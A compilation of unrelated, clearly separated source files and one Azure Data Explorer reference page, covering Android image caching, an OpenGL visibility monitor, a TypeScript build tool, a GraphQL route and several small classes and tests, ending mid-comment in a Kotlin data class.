exports.run = function (req, res) {
    fusker.blacklist.push({ip: req.connection.remoteAddress, date: new Date()});
};
|
---
title: series_fill_const() - Azure Data Explorer
description: This article describes series_fill_const() in Azure Data Explorer.
services: data-explorer
author: orspod
ms.author: orspodek
ms.reviewer: alexans
ms.service: data-explorer
ms.topic: reference
ms.date: 02/13/2020
---
# series_fill_const()
Replaces missing values in a series with a specified constant value.
Takes an expression containing a dynamic numerical array as input, replaces all instances of *missing_value_placeholder* with the specified *constant_value*, and returns the resulting array.
## Syntax
`series_fill_const(`*x*`, `*constant_value*`[,` *missing_value_placeholder*`])`
* Will return series *x* with all instances of *missing_value_placeholder* replaced with *constant_value*.
## Arguments
* *x*: dynamic array scalar expression that is an array of numeric values.
* *constant_value*: the value replacing missing values.
* *missing_value_placeholder*: optional parameter that specifies a placeholder for a missing value to be replaced. Default value is `double`(*null*).
**Notes**
* If you create the series using the [make-series](make-seriesoperator.md) operator, it fills in the missing values using default 0. Alternatively, you can specify a constant value to fill in by specifying `default = ` *DefaultValue* in the make-series statement.
```kusto
make-series num=count() default=-1 on TimeStamp from ago(1d) to ago(1h) step 1h by Os, Browser
```
* To apply any interpolation functions after [make-series](make-seriesoperator.md), specify *null* as a default value:
```kusto
make-series num=count() default=long(null) on TimeStamp from ago(1d) to ago(1h) step 1h by Os, Browser
```
* The *missing_value_placeholder* can be of any type, which will be converted to actual element types. As such, either `double`(*null*), `long`(*null*) or `int`(*null*) have the same meaning.
* The function preserves original type of the array elements.
## Example
<!-- csl: https://help.kusto.windows.net/Samples -->
```kusto
let data = datatable(`arr`: dynamic)
[
dynamic([111,null,36,41,23,null,16,61,33,null,null])
];
data
| project arr,
fill_const1 = series_fill_const(arr, 0.0),
fill_const2 = series_fill_const(arr, -1)
```
|`arr`|`fill_const1`|`fill_const2`|
|---|---|---|
|[111,null,36,41,23,null,16,61,33,null,null]|[111,0.0,36,41,23,0.0,16,61,33,0.0,0.0]|[111,-1,36,41,23,-1,16,61,33,-1,-1]|
|
class ChatRequestModel {
  /// Builds the form-field map for a message-send request.
  ///
  /// [userId] is the recipient id and [message] is the message text; they are
  /// placed under the `Chat[to_id]` / `Chat[message]` keys expected by the API.
  static messageSendRequestBody({var userId, var message}) {
    final Map<String, dynamic> data = <String, dynamic>{
      'Chat[to_id]': userId,
      'Chat[message]': message,
    };
    return data;
  }
}
|
package com.kangraoo.basektlib.tools.glide
import android.content.Context
import com.bumptech.glide.Glide
import com.bumptech.glide.GlideBuilder
import com.bumptech.glide.Registry
import com.bumptech.glide.annotation.GlideModule
import com.bumptech.glide.integration.okhttp3.OkHttpUrlLoader
import com.bumptech.glide.load.DecodeFormat
import com.bumptech.glide.load.engine.bitmap_recycle.LruBitmapPool
import com.bumptech.glide.load.engine.cache.DiskLruCacheFactory
import com.bumptech.glide.load.engine.cache.LruResourceCache
import com.bumptech.glide.load.model.GlideUrl
import com.bumptech.glide.module.AppGlideModule
import com.bumptech.glide.request.RequestOptions
import com.kangraoo.basektlib.exception.LibPermissionException
import com.kangraoo.basektlib.exception.LibStorageException
import com.kangraoo.basektlib.tools.log.ULog
import com.kangraoo.basektlib.tools.okhttp.UOkHttp
import com.kangraoo.basektlib.tools.store.filestorage.StorageType
import com.kangraoo.basektlib.tools.store.filestorage.UStorage
import com.kangraoo.basektlib.tools.store.filestorage.UStorage.getDirectoryByDirType
import com.kangraoo.basektlib.tools.store.filestorage.UStorage.storageCheck
import java.io.InputStream
/**
 * Created by hyy on 2018/09/17.
 *
 * Glide module that configures the memory cache, bitmap pool and disk cache,
 * and routes image downloads through the shared OkHttp client.
 */
@GlideModule
class SGlideModule : AppGlideModule() {
    // Disk cache budget for images: 100 MB.
    var cacheSize = 100L * 1024L * 1024L

    override fun applyOptions(
        context: Context,
        builder: GlideBuilder
    ) {
        val maxMemory = Runtime.getRuntime().maxMemory().toInt() // Total memory the runtime grants this app
        val memoryCacheSize = maxMemory / 8 // Use one eighth of it for the image memory cache
        // Configure the in-memory resource cache.
        builder.setMemoryCache(LruResourceCache(memoryCacheSize.toLong()))
        if (UStorage.initStorage) {
            try {
                // Verify image storage is available/permitted before pointing the disk cache at it.
                storageCheck(StorageType.TYPE_IMAGE)
                var diskLruCacheFactory = DiskLruCacheFactory(
                    getDirectoryByDirType(StorageType.TYPE_IMAGE),
                    cacheSize
                )
                builder.setDiskCache(diskLruCacheFactory)
            } catch (e: LibStorageException) {
                // Storage unavailable: log and fall back to Glide's default disk cache.
                ULog.e(e, e.message)
            } catch (e: LibPermissionException) {
                ULog.e(e, e.message)
            }
        }
        // Configure the image decode format (full-quality ARGB_8888).
        builder.setDefaultRequestOptions(RequestOptions().format(DecodeFormat.PREFER_ARGB_8888))
        // builder.setDecodeFormat(DecodeFormat.PREFER_ARGB_8888);
        // Configure the BitmapPool size (same budget as the memory cache).
        builder.setBitmapPool(LruBitmapPool(memoryCacheSize.toLong()))
    }

    override fun registerComponents(
        context: Context,
        glide: Glide,
        registry: Registry
    ) {
        // Replace Glide's default network loader with the app's shared OkHttp client.
        registry.replace(
            GlideUrl::class.java,
            InputStream::class.java,
            OkHttpUrlLoader.Factory(UOkHttp.instance.imageOkhttp())
        )
    }
}
|
package org.struckture.handlers;
import org.struckture.base.annotations.StruckField;
import java.lang.annotation.Annotation;
import java.nio.ByteBuffer;
import java.util.Set;
/**
* Byte Array Handler.
*/
/**
 * Handler for fixed-size byte arrays. The array length comes from the
 * {@link StruckField} annotation; the bytes may optionally be reversed
 * (see {@code isReversed()} on the parent handler).
 */
public class ByteArrayHandler extends ReversibleHandler<byte[]> {

    private int size = 0;

    @Override
    public void init(Set<Annotation> annotations) {
        super.init(annotations);
        StruckField fieldAnnotation = getAnnotation(StruckField.class);
        size = fieldAnnotation.size();
    }

    @Override
    public int getSize() {
        return size;
    }

    /** Reverses {@code data} in place by swapping symmetric elements. */
    private static void reverse(byte[] data) {
        for (int lo = 0, hi = data.length - 1; lo < hi; lo++, hi--) {
            byte swap = data[lo];
            data[lo] = data[hi];
            data[hi] = swap;
        }
    }

    @Override
    public byte[] getValue(ByteBuffer byteBuffer) {
        byte[] bytes = new byte[size];
        byteBuffer.get(bytes);
        if (isReversed()) {
            reverse(bytes);
        }
        return bytes;
    }
}
|
package academy.pocu.comp3500.lab9.data;
/**
 * Immutable value object holding the start and end times of a video clip,
 * exactly as supplied at construction.
 */
public final class VideoClip {

    private final int start;
    private final int end;

    public VideoClip(int start, int end) {
        this.start = start;
        this.end = end;
    }

    public int getStartTime() {
        return start;
    }

    public int getEndTime() {
        return end;
    }
}
|
import { Component, Input } from '@angular/core';
import { SpectatorPipe, createPipeFactory } from '@ngneat/spectator';
import { AveragePipe } from './average.pipe';
import { StatsService } from './stats.service';
// Host component used to exercise AveragePipe inside a real template:
// `prop` is piped through `avg` and its result rendered in the <div>.
// Specs override the default [1, 2, 3] input via `hostProps`.
@Component({
  template: `
    <div>{{ prop | avg }}</div>
  `
})
class CustomHostComponent {
  @Input() public prop: number[] = [1, 2, 3];
}
describe('AveragePipe', () => {
  let spectator: SpectatorPipe<AveragePipe>;

  // Shared factory: renders the pipe through CustomHostComponent's template.
  const createPipe = createPipeFactory({
    pipe: AveragePipe,
    host: CustomHostComponent,
    providers: [StatsService]
  });

  it('should compute the average of a given list of numbers', () => {
    // Host default input is [1, 2, 3], whose average is 2.
    spectator = createPipe();

    expect(spectator.element).toHaveText('2');
  });

  it('should result to 0 when list of numbers is empty', () => {
    spectator = createPipe({ hostProps: { prop: [] } });

    expect(spectator.element).toHaveText('0');
  });

  it('should delegate the calculation to the service', () => {
    const statsServiceStub = { avg: () => 42 };

    spectator = createPipe({
      providers: [{ provide: StatsService, useValue: statsServiceStub }]
    });

    expect(spectator.element).toHaveText('42');
  });
});
|
using UnityEngine;
using System.Collections;
using System;
/// <summary>
/// Toggles a wall between its intact and broken visuals each time an
/// enemy-faction object collides with it.
/// </summary>
public class BreakableObjectCollision : CollisionReceiver {

    public Transform builtWall;
    public Transform destroyedWall;
    public bool wallDestroyed = false;

    protected new void Awake() {
        base.Awake();
        // Fall back to this object's own transform when no wall is assigned.
        if (!builtWall) {
            builtWall = transform;
        }
        SetWallVisibility();
    }

    public override void OnCollideEnemyFaction(ProxyCollision other) {
        base.OnCollideEnemyFaction(other);
        // Each enemy hit flips between the built and the destroyed state.
        wallDestroyed = !wallDestroyed;
        SetWallVisibility();
    }

    private void SetWallVisibility() {
        // Show exactly one of the two sprites; only the intact wall collides.
        bool intact = !wallDestroyed;
        builtWall.GetComponent<BoxCollider2D>().enabled = intact;
        builtWall.GetComponent<SpriteRenderer>().enabled = intact;
        destroyedWall.GetComponent<SpriteRenderer>().enabled = wallDestroyed;
    }
}
|
package routes
import (
"github.com/cmelgarejo/go-gql-server/internal/handlers"
auth "github.com/cmelgarejo/go-gql-server/internal/handlers/auth/middleware"
"github.com/cmelgarejo/go-gql-server/internal/logger"
"github.com/cmelgarejo/go-gql-server/internal/orm"
"github.com/cmelgarejo/go-gql-server/pkg/utils"
"github.com/gin-gonic/gin"
)
// GraphQL registers the GraphQL POST endpoint (behind auth middleware) and,
// when enabled in the config, the GET playground endpoint.
func GraphQL(cfg *utils.ServerConfig, r *gin.Engine, orm *orm.ORM) error {
	endpoint := cfg.VersionedEndpoint(cfg.GraphQL.Path)
	playgroundPath := cfg.GraphQL.PlaygroundPath

	group := r.Group(endpoint)
	// Main GraphQL handler, guarded by the auth middleware.
	group.POST("", auth.Middleware(group.BasePath(), cfg, orm), handlers.GraphqlHandler(orm, &cfg.GraphQL))
	logger.Info("GraphQL @ ", endpoint)

	if cfg.GraphQL.IsPlaygroundEnabled {
		logger.Info("GraphQL Playground @ ", group.BasePath()+playgroundPath)
		group.GET(playgroundPath, handlers.PlaygroundHandler(group.BasePath()))
	}
	return nil
}
|
$remixd -s ./ --remix-ide https://remix.ethereum.org
This grants the IDE at https://remix.ethereum.org/ access to the shared folder.
|
import OpenGL
#OpenGL.ERROR_CHECKING=False
#OpenGL.ERROR_LOGGING = False
#OpenGL.ERROR_ON_COPY = True
#OpenGL.FULL_LOGGING = True
from OpenGL.GL import *
from OpenGL.error import GLError
from OpenGL.GLU import *
from OpenGL.arrays import vbo
from OpenGL.GL import shaders
import time
import math, random
import numpy
from numpy import linalg
import logging
logger = logging.getLogger("underworlds.visibility")
import underworlds
from underworlds.types import *
from underworlds.helpers.geometry import transform, get_world_transform
from underworlds.helpers import transformations
# GLSL 1.30 shaders for flat-color rendering: every mesh is drawn with a
# single uniform diffuse color (its picking/visibility color ID).
FLAT_VERTEX_SHADER="""
#version 130
uniform mat4 u_viewProjectionMatrix;
uniform mat4 u_modelMatrix;
uniform vec4 u_materialDiffuse;
in vec3 a_vertex;
out vec4 v_color;
void main(void)
{
v_color = u_materialDiffuse;
gl_Position = u_viewProjectionMatrix * u_modelMatrix * vec4(a_vertex, 1.0);
}
"""
# Fragment shader that simply outputs the color forwarded by the vertex shader.
BASIC_FRAGMENT_SHADER="""
#version 130
in vec4 v_color;
void main() {
gl_FragColor = v_color;
}
"""
# 180 degree rotation around the X axis, used to flip the camera frame into
# the OpenGL convention (Z pointing backward).
ROTATION_180_X = numpy.array([[1,0,0,0],[0,-1,0,0],[0,0,-1,0],[0,0,0,1]], dtype=numpy.float32)
# Near/far clip planes used when a camera does not define its own.
DEFAULT_CLIP_PLANE_NEAR = 0.001
DEFAULT_CLIP_PLANE_FAR = 1000.0
class VisibilityMonitor:
    """Computes which nodes of an underworlds world are visible per camera.

    Every mesh node is rendered off-screen with a unique flat color;
    reading back the framebuffer and collecting the distinct colors yields
    the set of visible nodes.
    """

    def __init__(self, ctx, world, w=80, h=60, create_surface=True, debug=False):
        """
        :param ctx: underworlds context, used to retrieve mesh data
        :param world: the underworlds world to monitor
        :param w: width in pixels of the render surface
        :param h: height in pixels of the render surface
        :param create_surface: when True, create a (hidden) pygame OpenGL surface
        :param debug: when True, keep the surface visible and slow rendering down
        :raises RuntimeError: if the world contains no camera
        """
        self.debug = debug
        self.w = w
        self.h = h

        if create_surface:
            import pygame
            pygame.init()
            if not debug:
                pygame.display.set_mode((w, h), pygame.OPENGL | pygame.DOUBLEBUF)
                pygame.display.iconify()
            else:
                pygame.display.set_mode((w, h), pygame.OPENGL | pygame.DOUBLEBUF | pygame.RESIZABLE)

        self.prepare_shaders()

        self.ctx = ctx
        self.world = world
        self.scene = None
        self.meshes = {}        # OpenGL vertex/faces buffer pointers, keyed by mesh ID
        self.node2colorid = {}  # color ID for each node (mouse picking / visibility)
        self.colorid2node = {}  # reverse dict of node2colorid
        self.cameras = []

        self.load_world()

        if not self.cameras:
            raise RuntimeError("No camera in the world <%s>. Giving up." % self.world)

    def prepare_shaders(self):
        """Compiles the flat-color shader program and caches its uniform and
        attribute locations as attributes on the program object."""
        flatvertex = shaders.compileShader(FLAT_VERTEX_SHADER, GL_VERTEX_SHADER)
        fragment = shaders.compileShader(BASIC_FRAGMENT_SHADER, GL_FRAGMENT_SHADER)

        self.flatshader = shaders.compileProgram(flatvertex, fragment)

        self.set_shader_accessors(('u_modelMatrix',
                                   'u_viewProjectionMatrix',
                                   'u_materialDiffuse',),
                                  ('a_vertex',), self.flatshader)

    def set_shader_accessors(self, uniforms, attributes, shader):
        """Looks up the given uniform and attribute locations and stores each
        one as an attribute of ``shader``.

        :raises RuntimeError: if a uniform/attribute is missing (e.g. optimized
            out by the shader compiler)
        """
        for uniform in uniforms:
            location = glGetUniformLocation(shader, uniform)
            if location in (None, -1):
                raise RuntimeError('No uniform: %s (maybe it is not used '
                                   'anymore and has been optimized out by'
                                   ' the shader compiler)' % (uniform))
            setattr(shader, uniform, location)

        for attribute in attributes:
            location = glGetAttribLocation(shader, attribute)
            if location in (None, -1):
                raise RuntimeError('No attribute: %s' % (attribute))
            setattr(shader, attribute, location)

    def prepare_gl_buffers(self, id):
        """Fetches mesh ``id`` from the server (blocking until it is
        available) and uploads its vertices and faces to GL buffers.

        No-op if the mesh is already loaded.
        """
        meshes = self.meshes

        if id in meshes:
            # mesh already loaded. Fine
            return

        meshes[id] = {}

        # leave some time for new nodes to push their meshes
        if not self.ctx.has_mesh(id):
            logger.warning("Mesh ID %s is not available on the server... "
                           "waiting for it..." % id)
            while not self.ctx.has_mesh(id):
                time.sleep(0.01)
            logger.info("Mesh ID %s is now available. Getting it..." % id)

        mesh = self.ctx.mesh(id)  # retrieve the mesh from the server

        # Fill the buffer for vertex
        v = numpy.array(mesh.vertices, 'f')
        meshes[id]["vbo"] = vbo.VBO(v)

        # Fill the buffer with faces indices
        meshes[id]["faces"] = glGenBuffers(1)
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, meshes[id]["faces"])
        glBufferData(GL_ELEMENT_ARRAY_BUFFER,
                     numpy.array(mesh.faces, dtype=numpy.int32),
                     GL_STATIC_DRAW)
        meshes[id]["nbfaces"] = len(mesh.faces)
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)

    def get_rgb_from_colorid(self, colorid):
        """Splits a 24-bit color ID into its (r, g, b) byte components
        (r is the least significant byte)."""
        r = (colorid >> 0) & 0xff
        g = (colorid >> 8) & 0xff
        b = (colorid >> 16) & 0xff

        return (r, g, b)

    def get_color_id(self):
        """Returns a random, unused, 24-bit color ID.

        IDs are drawn from [1, 256**3 - 1]: 0 is reserved for the
        background, and the upper bound must fit in 3 bytes (the original
        randint(0, 256**3) could return both 0 and a 25-bit value).
        """
        id = random.randint(1, 256 * 256 * 256 - 1)
        if id not in self.colorid2node:
            return id
        else:
            return self.get_color_id()

    def glize(self, node):
        """Prepares a node for rendering.

        Mesh nodes get a unique color ID and their GL buffers; camera nodes
        are collected into ``self.cameras``.

        :raises RuntimeError: if a mesh node carries no mesh data
        """
        if node.type == MESH:
            colorid = self.get_color_id()
            self.colorid2node[colorid] = node
            self.node2colorid[node] = colorid

            # Prefer CAD models, then low-res, then hi-res meshes.
            if hasattr(node, "cad"):
                node.glmeshes = node.cad
            elif hasattr(node, "lowres"):
                node.glmeshes = node.lowres
            elif hasattr(node, "hires"):
                node.glmeshes = node.hires
            else:
                # Fixed: StandardError does not exist in Python 3.
                raise RuntimeError("The node %s has no mesh available!" % node.name)

            for mesh in node.glmeshes:
                self.prepare_gl_buffers(mesh)

        elif node.type == CAMERA:
            logger.info("Added camera <%s>" % node.name)
            self.cameras.append(node)

    def load_world(self):
        """Runs :meth:`glize` over every node of the world's scene."""
        logger.info("Preparing world <%s> for 3D rendering..." % self.world)
        scene = self.scene = self.world.scene
        nodes = scene.nodes
        for node in nodes:
            logger.info("Loading node <%s>" % node)
            self.glize(node)
        logger.info("World <%s> ready for visibility monitoring." % self.world)

    def set_camera(self, name):
        """Sets up the GL projection and modelview matrices for the camera
        named ``name``, refreshing its pose from the server first.

        :raises RuntimeError: if no camera with that name exists
        """
        camera = None
        for c in self.cameras:
            if c.name == name:
                camera = c
                break
        if camera is None:
            raise RuntimeError("Camera <%s> does not exist in world <%s>" % (name, self.world.name))

        # Update the camera position from the server
        camera = self.scene.nodes[camera.id]

        znear = camera.clipplanenear or DEFAULT_CLIP_PLANE_NEAR
        zfar = camera.clipplanefar or DEFAULT_CLIP_PLANE_FAR
        aspect = camera.aspect
        fov = camera.horizontalfov

        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()

        # Compute gl frustrum
        tangent = math.tan(fov / 2.)
        h = znear * tangent
        w = h * aspect

        # params: left, right, bottom, top, near, far
        glFrustum(-w, w, -h, h, znear, zfar)
        # equivalent to:
        # gluPerspective(fov * 180/math.pi, aspect, znear, zfar)

        self.projection_matrix = glGetFloatv(GL_PROJECTION_MATRIX).transpose()

        self.view_matrix = linalg.inv(get_world_transform(self.scene, camera))
        # Rotate by 180deg around X to have Z pointing backward (OpenGL convention)
        self.view_matrix = numpy.dot(ROTATION_180_X, self.view_matrix)

        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        glMultMatrixf(self.view_matrix.transpose())

    def render_colors(self):
        """Renders the whole scene, one flat unique color per mesh node."""
        glEnable(GL_DEPTH_TEST)
        glDepthFunc(GL_LEQUAL)
        glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
        glEnable(GL_CULL_FACE)

        glUseProgram(self.flatshader)

        glUniformMatrix4fv(self.flatshader.u_viewProjectionMatrix, 1, GL_TRUE,
                           numpy.dot(self.projection_matrix, self.view_matrix))

        self.recursive_render(self.scene.rootnode, self.flatshader)

        glUseProgram(0)

    def compute_all(self):
        """
        :returns: dictionary {camera: [visible nodes]}
        Attention: The performances of this method relies heavily on the size of the display!
        """
        visible_objects = {}
        for c in self.cameras:
            visible_objects[c.name] = self.from_camera(c.name)
        return visible_objects

    def from_camera(self, camera):
        """Renders the scene from the named camera and returns the list of
        nodes whose color appears in the resulting framebuffer."""
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)

        self.set_camera(camera)
        self.render_colors()

        # Capture image from the OpenGL buffer
        buf = (GLubyte * (3 * self.w * self.h))(0)
        glReadPixels(0, 0, self.w, self.h, GL_RGB, GL_UNSIGNED_BYTE, buf)

        # Reinterpret the RGB pixel buffer as a 1-D array of 24bits colors
        a = numpy.ndarray(len(buf), numpy.dtype('>u1'), buf)
        # Fixed: use integer division -- len(buf) / 3 is a float in Python 3.
        colors = numpy.zeros(len(buf) // 3, numpy.dtype('<u4'))
        for i in range(3):
            colors.view(dtype='>u1')[i::4] = a.view(dtype='>u1')[i::3]

        seen = numpy.unique(colors)
        seen.sort()
        seen = seen[1:]  # remove the 0 for background

        if self.debug:
            import pygame
            pygame.display.flip()
            time.sleep(1)

        return [self.colorid2node[i] for i in seen]

    def recursive_render(self, node, shader):
        """ Main recursive rendering method.
        """
        try:
            m = get_world_transform(self.scene, node)
        except AttributeError:
            # probably a new incoming node, that has not yet been converted to numpy
            self.glize(node)
            m = get_world_transform(self.scene, node)

        if node.type == MESH:
            # if the node has been recently turned into a mesh, we might not
            # have the mesh data yet.
            if not hasattr(node, "glmeshes"):
                self.glize(node)

            for id in node.glmeshes:
                stride = 12  # 3 * 4 bytes

                colorid = self.node2colorid[node]
                r, g, b = self.get_rgb_from_colorid(colorid)
                glUniform4f(shader.u_materialDiffuse, r / 255.0, g / 255.0, b / 255.0, 1.0)

                glUniformMatrix4fv(shader.u_modelMatrix, 1, GL_TRUE, m)

                vbo = self.meshes[id]["vbo"]
                vbo.bind()

                glEnableVertexAttribArray(shader.a_vertex)

                glVertexAttribPointer(
                    shader.a_vertex,
                    3, GL_FLOAT, False, stride, vbo
                )

                glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.meshes[id]["faces"])
                glDrawElements(GL_TRIANGLES, self.meshes[id]["nbfaces"] * 3, GL_UNSIGNED_INT, None)

                vbo.unbind()
                glDisableVertexAttribArray(shader.a_vertex)
                glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)

        for child in node.children:
            try:
                self.recursive_render(self.scene.nodes[child], shader)
            except KeyError:
                logger.warning("Node ID %s listed as child of %s, but it"
                               " does not exist! Skipping it" % (child, repr(node)))
|
import * as fs from 'fs-extra';
import * as path from 'path';
import { Utils } from '~/utils';
import { State } from '~/states/state';
import { Processor } from '~/processors/processor';
import { Finalizer } from '~/processors/finalizer';
import { Rule, Environment, Configuration } from '~/models/builder-models';
import { ProcessorInput } from '~/models/processor-models';
export class Builder {
  protected name: string;
  protected envPromise: Promise<Environment>;
  protected stateClass: typeof State;
  protected env: Environment;
  protected states: State[];
  protected fileToRule: Map<string, Rule>;
  protected ruleToTargets: Map<Rule, string[]>;

  /**
   * @param {string} rootDir Project root directory
   * @param {string} workDir Work directory
   * @param {string} userFile User config file name/path (resolved against rootDir)
   * @param {any} defaults Default config
   */
  constructor(rootDir: string, workDir: string, userFile: string, defaults: any) {
    this.envPromise = this.buildEnv(rootDir, workDir, userFile, defaults);
    this.name = this.constructor.name;
    this.stateClass = State;
    this.ruleToTargets = new Map();
  }

  /**
   * Import configs in user file, merge with default configs
   * @param {string} userFile Path to user config file
   * @returns {any} User configs (empty object if the file doesn't exist)
   */
  private getConfig(userFile: string): any {
    let userConfig: any = {};
    if (fs.existsSync(userFile)) {
      try {
        userConfig = require(userFile);
      } catch (err) {
        Utils.fatal(`${userFile} corrupted or unreadable.`, err);
      }
    } else {
      Utils.info(`${userFile} doesn't exist, will use default config.`);
    }
    return userConfig;
  }

  /**
   * Sanitize config: resolve directories against rootDir and normalize
   * every rule (sources as array, empty file set, finalizer, processors).
   * @param {Configuration} config Config
   * @param {string} rootDir Project root directory
   * @returns {Configuration} Sanitized config
   */
  private sanitizeConfig(config: Configuration, rootDir: string): Configuration {
    config.relativeSourceDir = config.sourceDir;
    config.relativeTargetDir = config.targetDir;
    config.sourceDir = path.resolve(rootDir, config.sourceDir);
    config.targetDir = path.resolve(rootDir, config.targetDir);
    config.rules.forEach(rule => {
      rule.sources = rule.sources ? [].concat(rule.sources) : [];
      rule.files = new Set();
      rule.finalizer = new Finalizer(config.targetDir, rule.targets);
      rule.processors = rule.processors || [];
      rule.processors.forEach(processor => {
        // Subclasses customize behavior via hooks, never via .process() itself.
        if (processor.process !== Processor.prototype.process) {
          Utils.fatal(`${processor.id}: .process() shouldn't be overriden.`);
        }
      });
    });
    return config;
  }

  /**
   * Merge default and user config.
   * Fallback rules come first so user rules take priority in matchRule's
   * reverse traversal.
   * @param {any} defaults Default config
   * @param {any} userConfig User config
   * @returns {Configuration} Merged config
   */
  private mergeConfig(defaults: any, userConfig: any): Configuration {
    let fallbackRules: any[] = defaults.fallbackRules;
    let rules: any[] = userConfig.rules || [];
    let config: Configuration;
    delete defaults.fallbackRules;
    delete userConfig.fallbackRules;
    config = Utils.shallowMerge(defaults, userConfig);
    config.rules = fallbackRules.concat(rules);
    return config;
  }

  /**
   * Matches a file path against rules in reversed order, return the first found
   * @param config Config
   * @param file File to match
   * @returns The matched rule, or undefined if no match
   */
  protected matchRule(config: Configuration, file: string): Rule | undefined {
    // Traverse in reverse order so later rules have higher priorities
    for (let i = config.rules.length - 1; i >= 0; --i) {
      let rule = config.rules[i];
      if (Utils.matchOrEqual(file, rule.sources)) {
        return rule;
      }
    }
    return undefined;
  }

  /**
   * Scan source directory, get full manifest of files, and add matched files
   * to each rule in config.
   * Also build mapping from file path to matching rule (this.fileToRule).
   * @param {Configuration} config Config
   * @returns {Promise<Configuration>} Config with matched files
   */
  private async matchSourceFiles(config: Configuration): Promise<Configuration> {
    this.fileToRule = new Map();
    (await Utils.listAllFiles(config.sourceDir, true)).forEach(file => {
      let rule = this.matchRule(config, file);
      if (rule) {
        rule.files.add(file);
        this.fileToRule.set(file, rule);
      }
    });
    return config;
  }

  /**
   * Consolidate global variables
   * @param {string} rootDir Project directory
   * @param {string} workDir Work directory
   * @param {string} userFile User file name
   * @param {any} defaults Default config
   */
  private async buildEnv(rootDir: string, workDir: string, userFile: string, defaults: any): Promise<Environment> {
    let userFilePath: string = path.resolve(rootDir, userFile);
    let userConfig: any = this.getConfig(userFilePath);
    let mergedConfig: Configuration = this.mergeConfig(defaults, userConfig);
    let sanitizedConfig: Configuration = this.sanitizeConfig(mergedConfig, rootDir);
    let config = await this.matchSourceFiles(sanitizedConfig);
    let env = new Environment();
    env.rootDir = rootDir;
    env.workDir = workDir;
    env.sourceDir = config.sourceDir;
    env.targetDir = config.targetDir;
    env.relativeSourceDir = config.relativeSourceDir;
    env.relativeTargetDir = config.relativeTargetDir;
    env.userFile = userFilePath;
    env.config = config;
    Utils.dbg() && Utils.debug('Environment: ', Utils.toJson(env));
    return env;
  }

  /**
   * Get all build targets
   * @returns Array for targets
   */
  protected getAllTargets(): string[] {
    return [...this.ruleToTargets.values()]
      .reduce((all, perRule) => all.concat(perRule), []);
  }

  /**
   * Ensures a symlink to the node_modules dir exists in the processor work dir
   * @param dir Work dir of a processor
   */
  private async ensureNodeModules(dir: string): Promise<void> {
    let npdir = path.resolve(this.env.rootDir, 'node_modules');
    let symlink = path.resolve(dir, 'node_modules');
    return fs.ensureSymlink(npdir, symlink);
  }

  /**
   * Invoke processors in a rule, mutate states
   * @param rule Rule
   * @param state State
   * @returns true if all processors succeeded, false otherwise
   */
  protected async invokeProcessors(rule: Rule, state: State): Promise<boolean> {
    let success: boolean = true;
    for (let processor of rule.processors) {
      let input: ProcessorInput = state.nextInput();
      await this.ensureNodeModules(state.currentContext().rootDir);
      let output = await processor.process(input);
      state.saveOutput(output);
      success = success && !output.failures.length;
    }
    if (rule.processors.length) {
      let targets: string[] = await rule.finalizer.finalize(state.finalizerInput());
      Utils.dbg() && Utils.debug(`Build passed in ${rule.sources}:`, targets);
      this.ruleToTargets.set(rule, targets);
    }
    return success;
  }

  /**
   * Do one time build
   * @returns Promise, resolve when done.
   */
  async build(): Promise<void> {
    let success: boolean = true;
    this.env = await this.envPromise;
    this.states = await Promise.all(this.env.config.rules.map(async rule => {
      let state = new this.stateClass(this.env, rule);
      if (rule.files.size) {
        state.beforeBuild();
        success = await this.invokeProcessors(rule, state) && success;
        state.afterBuild();
      }
      return state;
    }));
    let targets: string[] = this.getAllTargets();
    Utils.dbg() && Utils.debug(`${this.name}: Final targets`, targets);
    return Utils.cleanDirectory(this.env.targetDir, targets)
      .then(() => Utils.info(`Build ${success ? 'SUCCESS' : 'FAILED'}`))
      .catch(ex => Utils.error(`Error happened during cleanup`, ex));
  }

  exit(): void {
  }
}
|
package mx.buap.fcc.clasificador.model
import mx.buap.fcc.clasificador.tools.MathTools
import java.math.BigDecimal
import java.math.BigDecimal.*
import java.math.RoundingMode
import java.util.*
/**
 * A single data row (feature vector) of a DataSet, with an index, an
 * optional class label and an array of BigDecimal attribute values.
 *
 * @author Carlos Montoya
 */
class Instance
constructor(val indice: Int = 0,
            val clazz: Int = -1,
            val data: Array<BigDecimal>)
{
    // Decimal precision used for square roots and divisions.
    companion object { const val precision = 13 }

    // Owning DataSet; provides per-attribute statistics (min, max, average,
    // standard deviation) and attribute-type queries used by normalization.
    private var dataSet: DataSet? = null

    operator fun get(i: Int) = data[i]
    operator fun set(i: Int, att: BigDecimal) { data[i] = att }

    fun size() = data.size

    fun setDataSet(ds: DataSet) { this.dataSet = ds }

    /**
     * Euclidean distance between this instance and [other], computed over
     * all attributes with [precision] decimal digits.
     */
    fun distance(other: Instance): BigDecimal {
        var sqrDistSum = ZERO
        for (i in data.indices)
            sqrDistSum += data[i].subtract(other[i]).pow(2)
        return MathTools.sqrt(sqrDistSum, precision)
    }

    /**
     * Returns the distance between the specified attribute and the second
     * parameter. A null value is at maximal distance (ONE). For a nominal
     * attribute the distance is ZERO when the values are equal and ONE
     * otherwise; for numerical attributes it is the absolute difference.
     * (The original Spanish comment stated 1-when-equal; the code returns
     * ZERO when equal.)
     */
    private fun distance(attribute: Int, other: BigDecimal?): BigDecimal =
        when {
            other == null -> ONE
            dataSet?.isNominal(attribute) == true ->
                if (data[attribute] == other) ZERO
                else ONE
            else -> data[attribute].subtract(other).abs()
        }

    /**
     * Normalizes this row in place with the min-max method, mapping each
     * numerical attribute into [newMin, newMax]. Attributes whose min and
     * max coincide are set to the midpoint of the new range.
     */
    fun minmax(newMin: BigDecimal, newMax: BigDecimal) {
        val diffNewMinNewMax = newMax - newMin
        for (i in data.indices) {
            val diffMinMax = dataSet!!.maximum[i] - dataSet!!.minimum[i]
            if (diffMinMax == ZERO)
                data[i] = (newMin + newMax) / BigDecimal(2)
            else if (dataSet!!.isNumerical(i))
                data[i] = data[i]
                    .subtract(dataSet!!.minimum[i])
                    .divide(diffMinMax, precision, RoundingMode.HALF_UP)
                    .multiply(diffNewMinNewMax)
                    .add(newMin)
                    .stripTrailingZeros()
        }
    }

    /**
     * Normalizes this row in place with the z-score method, using the
